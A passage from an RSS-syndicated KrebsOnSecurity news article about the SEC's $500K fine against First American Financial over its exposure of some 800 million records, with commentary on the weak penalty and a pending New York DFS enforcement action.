					Reporting for Reuters Regulatory Intelligence, Richard Satran says the SEC charged First American with violating <a href="https://regintel.thomsonreuters.com/#accelus/ri/%7B%22location%22%3A%22%23ri%2Fdocument%2FIB24519D3415811E7BBBE00FF10906607%2Fview%2F%257B%2522searchId%2522%253A%2522i0ad69f050000017a11d5ee5bd08edb08%2522%252C%2522resultId%2522%253A%2522i0ad818130000017a11d5e8c5cda6b79f%2522%252C%2522contentType%2522%253A%2522Regulatory%2520Guidance%2520Summaries%2522%252C%2522contentTypeSearchId%2522%253A%2522i0ad69f050000017a11d5e61cd08edaff%2522%252C%2522returnText%2522%253A%2522backToSearch%2522%252C%2522returnTo%2522%253A%2522ri%252Fsearch%252Fi0ad69f050000017a11d5ee5bd08edb08%252Foverview%2522%252C%2522resultsToInclude%2522%253A%2522SUBSCRIBED%2522%252C%2522originType%2522%253A%2522Search%2522%252C%2522originId%2522%253A%2522i0ad69f050000017a11d5ee5bd08edb08%2522%252C%2522highlightTerms%2522%253A%2522240.13a-15%2520Controls%2520and%2520procedures.%2522%252C%2522order%2522%253A%2522RELEVANCE%2522%257D%22%7D" rel="external nofollow" target="_blank">Rule 13a-15(a) of the Exchange Act.</a>
				</p>

				<p>
					 
				</p>

				<p>
					“The rule broadly requires firms involved in securities issuance to have a compliance process in place to assure material information follows securities laws,” Satran wrote. “The SEC avoided getting into the specific details of the breach and instead focused on the way its disclosure was handled.”
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.linkedin.com/in/raschcyber/" rel="external nofollow" target="_blank">Mark Rasch</a>, also a former federal prosecutor in Washington, said the SEC is signaling with this action that it intends to take on more cases in which companies flub security governance in some big way.
				</p>

				<p>
					 
				</p>

				<p>
					“It’s a win for the SEC, and for First American, but it’s hardly justice,” Rasch said. “It’s a paltry fine, and it involves no admission of guilt by First American.”
				</p>

				<p>
					 
				</p>

				<p>
					Rasch said First American’s first problem was labeling the weakness as a medium risk.
				</p>

				<p>
					 
				</p>

				<p>
					“This is lots of sensitive data you’re exposing to anyone with a web browser,” Rasch said. “That’s a high-risk vulnerability. It also means you probably don’t know whether or not anyone has accessed that data. There’s no way to tell unless you can go back through all your logs all those years.”
				</p>

				<p>
					 
				</p>

				<p>
					The SEC said the 800 million+ records had been publicly available on First American’s website since 2013. In August 2019, the company said a third-party investigation into the exposure identified just 32 consumers whose non-public personal information likely was accessed without authorization.
				</p>

				<p>
					 
				</p>

				<p>
					When KrebsOnSecurity asked how long it maintained access logs or how far back in time that review went, First American declined to be more specific, saying only that its logs covered a period that was typical for a company of its size and nature.
				</p>

				<p>
					 
				</p>

				<p>
					However, documents from New York financial regulators show First American was unable to determine whether records were accessed prior to June 2018 (one year prior to fixing the weakness).
				</p>

				<p>
					 
				</p>

				<p>
					The records exposed by First American would have been a virtual gold mine for phishers and scammers involved in Business Email Compromise (BEC) scams, which often impersonate real estate agents, closing agencies, title and escrow firms in a bid to <a href="https://krebsonsecurity.com/2017/04/blind-trust-in-email-could-cost-you-your-home/" rel="external nofollow" target="_blank">trick property buyers into wiring funds to fraudsters</a>. According to the FBI, BEC scams are the most costly form of cybercrime today.
				</p>

				<p>
					 
				</p>

				<p>
					First American is not out of the regulatory woods yet from this enormous data leak. In July 2020, the New York State Department of Financial Services <a href="https://krebsonsecurity.com/2020/07/ny-charges-first-american-financial-for-massive-data-leak/" rel="external nofollow" target="_blank">announced the company was the target of their first ever cybersecurity enforcement action</a> in connection with the incident, charges that could bring steep financial penalties. That inquiry is ongoing.
				</p>

				<p>
					 
				</p>

				<p>
					The DFS considers each instance of exposed personal information a separate violation, and the company faces penalties of up to $1,000 per violation. According to the SEC, First American’s EaglePro database contained tens of millions of document images that included non-public personal information.
				</p>
			</div>
		</article>
	</div>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://krebsonsecurity.com/2021/06/first-american-financial-pays-farcical-500k-fine/" rel="external nofollow">First American Financial Pays Farcical $500K Fine</a>
</p>
]]></description><guid isPermaLink="false">715</guid><pubDate>Fri, 18 Jun 2021 21:56:08 +0000</pubDate></item></channel></rss>
